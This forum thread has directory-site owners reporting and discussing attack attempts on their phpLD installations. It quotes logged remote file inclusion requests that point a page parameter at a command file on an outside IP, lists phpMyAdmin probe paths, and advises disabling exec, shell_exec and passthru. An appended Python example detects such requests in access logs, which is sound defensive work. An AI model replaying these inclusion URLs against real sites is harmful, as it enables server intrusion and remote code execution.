Hi, seen loads of threads with hacked directories, so I ensure I have proper safeguards in place: instant emails where an out-of-place URL is typed, and full local backup and database backup cron jobs running on the hour! Yeah... somewhat edgy here. This URL came today: http: // nic. dir .vc/look. php?id=http://211.155.235.169 /sewam / cmd.txt so... please do ban the IP. Regards, M. PS: http://wq.apnic.net/apnic-bin/whois.pl?searchtext=211.155.235.169 My advice against this kind of attack: first get in touch with your coder and ask if the following functions are being used; if not, ask your host to disable them: > exec > shell_exec > passthru
I didn't get hacked... just attacked. Someone was snooping around! So a little heads up for the IP address! Yes... nothing is 100% secure, but the way phpLD is built up it is very secure. But still, one has to watch out for these guys; a**hole crackers are always lookin' for security holes! M.
Everything gets probed for security holes, constantly. Phpld is probably the biggest directory target for hackers, simply because it's the most used. Always run the latest version and you should be safer. Take a look at your 404 stats: this should give you an idea of how many bots are looking for things you might have installed, in the hope you have some outdated code they can use to cause mayhem, steal data, or just turn your server into a spam zombie. I think most 404s are caused by bots rather than people.
Indeed, I've lost count of the number of variations for 'phpMyAdmin'... here are just a few from the past hour! /phpMyAdmin-2.5.5-rc1/main.php /phpMyAdmin-2.6.1-rc1/main.php /phpMyAdmin-2.6.1-pl2/main.php /phpMyAdmin-2.5.5/main.php /phpMyAdmin-2.8.0.4/main.php /phpMyAdmin-2.8.0/main.php /phpMyAdmin-2.6.2/main.php /phpMyAdmin-2.6.1-pl3/main.php /phpMyAdmin-2.5.5-pl1/main.php /phpMyAdmin-2.6.4/main.php /phpMyAdmin-2.8.1-rc1/main.php /phpMyAdmin-2.7.0-pl2/main.php /phpMyAdmin-2.6.0-rc2/main.php /phpMyAdmin-2.8.0-rc2/main.php /phpMyAdmin-2.8.2/main.php
As Obelia rightly pointed out 404 pages: I am using phpLD 2.1.2 (modded beyond the possibility of an upgrade!!!), so I have my own 404 pages. You could use flat files to keep track of 404 pages. The IP was in the query string... and amazingly the file is still there! http://211.155.235.169 /sewam / cmd.txt Perhaps the guy is busy hitting various people with the same file! Regards, M.
It's not only PHPLD. Installations that are commonly used around the net are prime for a quick hack attack, like WordPress or Gallery2.
Hey, thanks for the heads up on the IP... I'm not sure if it was a hacking attempt, but under "site title", someone tried to enter something like: into my directory the other day... Do they think I don't review the submissions?
That possibly was a hacking attempt, checking to see if they could do an SQL injection on your form. Or it could be a test to see whether you're publishing things without moderation: the spammer will hit loads of websites with these form entries, then search for the odd-looking text. Anywhere it comes up, he will return to spam into oblivion.
Now this guy has a BOT working!!! At URL: nic.dir.vc/index.php?page=http://211.155.235.169/sewam/cmd.txt? Referrer: UA: libwww-perl/5.65 (I'm assuming libwww-perl/5.65 is a bot made in Perl). How much extra time do people have?
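Added example, not part of the thread and not phpLD code: a Python pass over a web access log that flags requests like the two reported above, where a query parameter's value is an absolute URL, and tallies 404s per client as suggested for spotting scanners. The log lines, addresses and function names are constructed for illustration, and the "combined" log layout is an assumption about the server.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Assumed log layout: Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself an absolute URL, e.g. id=http://host/cmd.txt
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.I)

# Constructed sample lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.9 - - [10/Oct/2006:13:55:36 +0000] "GET /look.php?id=http://203.0.113.7/x/cmd.txt HTTP/1.1" 404 512 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [10/Oct/2006:14:02:11 +0000] "GET /index.php?page=http%3A%2F%2F203.0.113.7%2Fx%2Fcmd.txt%3F HTTP/1.0" 200 8120 "-" "libwww-perl/5.65"',
    '192.0.2.44 - - [10/Oct/2006:14:03:00 +0000] "GET /phpMyAdmin-2.8.2/main.php HTTP/1.1" 404 512 "-" "-"',
    '192.0.2.44 - - [10/Oct/2006:14:03:01 +0000] "GET /phpMyAdmin-2.6.4/main.php HTTP/1.1" 404 512 "-" "-"',
    '192.0.2.80 - - [10/Oct/2006:14:05:40 +0000] "GET /index.php?search=http+headers HTTP/1.1" 200 9034 "-" "Mozilla/5.0"',
]

def remote_url_params(target):
    """Return (name, value) pairs whose URL-decoded value is an absolute URL."""
    query = target.partition("?")[2]
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE.match(v)]

def scan(lines):
    """Return (hits, probes): remote-URL-parameter requests and 404 counts per client."""
    hits, probes = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        params = remote_url_params(m["target"])
        if params:
            hits.append({"ip": m["ip"], "path": m["target"].partition("?")[0],
                         "params": params,
                         # secondary signal only: a library UA is trivial to change
                         "scripted_ua": m["ua"].lower().startswith("libwww-perl")})
        if m["status"] == "404":
            probes[m["ip"]] += 1
    return hits, probes

if __name__ == "__main__":
    found, counts = scan(SAMPLE_LOG)
    for hit in found:
        print("remote-URL parameter:", hit)
    for ip, n in counts.most_common():
        print("404s from", ip, "=", n)
```

The check decodes the query string before matching, so percent-encoded variants of the same request are caught, while an ordinary search term such as `http headers` is not.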